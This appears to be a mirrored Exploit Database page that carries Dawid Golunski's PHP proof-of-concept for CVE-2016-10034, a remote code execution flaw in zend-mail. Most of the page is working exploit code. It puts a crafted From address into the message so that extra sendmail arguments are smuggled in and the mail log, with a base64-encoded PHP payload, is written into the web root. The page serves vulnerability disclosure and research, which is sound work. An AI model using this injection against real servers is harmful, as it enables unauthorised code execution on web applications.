Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Dawid Golunski
  日期： 2016-12-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40979/

• <?php
   
  /*
   
  Zend Framework < 2.4.11Remote Code Execution (CVE-2016-10034)
  zend-mail < 2.4.11 
  zend-mail < 2.7.2 
   
  Discovered/Coded by:
   
  Dawid Golunski
  https://legalhackers.com
   
  Full Advisory URL:
  https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
  
  Video PoC
  https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
  
  
  Follow the feed for updates:
  
  https://twitter.com/dawid_golunski
  
   
  A simple PoC (working on Sendmail MTA)
   
  It will inject the following parameters to sendmail command:
   
  Arg no. 0 == [/usr/sbin/sendmail]
  Arg no. 1 == [-t]
  Arg no. 2 == [-i]
  Arg no. 3 == [-r]
  Arg no. 4 == [attacker\]
  Arg no. 5 == [-oQ/tmp/]
  Arg no. 6 == [-X/var/www/cache/phpcode.php]
  Arg no. 7 == ["@email.com]
  
  
  
  which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
  Note /var/www/cache must be writable by www-data web user.
  
  The resulting file will contain the payload passed in the body of the msg:
   
  09607 <<< Content-Type: text/html; charset=us-ascii
  09607 <<< 
  09607 <<< <?php phpinfo(); ?>
  09607 <<< 
  09607 <<< 
  09607 <<< 
   
   
  See the full advisory URL for the exploit details.
   
  */
   
   
  // Attacker's input coming from untrusted source such as $_GET , $_POST etc.
  // For example from a Contact form with sender field
   
  $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
  // encoded phpinfo() php code
  $msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
  
  
  
  // ------------------
   
  // mail() param injection via the vulnerability in zend-mail
  
  
  chdir(dirname(__DIR__));
  include 'vendor/Zend/Loader/AutoloaderFactory.php';
  
  Zend\Loader\AutoloaderFactory::factory(array(
  'Zend\Loader\StandardAutoloader' => array(
  'autoregister_zf' => true
  )
  ));
  
  Zend\Mvc\Application::init(require 'config/application.php')->run();
  
  $message= new \Zend\Mail\Message();
  
  $message->setBody($msg_body);
  $message->setFrom($email_from, 'Attacker');
  $message->addTo('support@localhost', 'Support');
  $message->setSubject('Zend PoC');
  
  $transport= new \Zend\Mail\Transport\Sendmail();
  $transport->send($message);
  
  ?>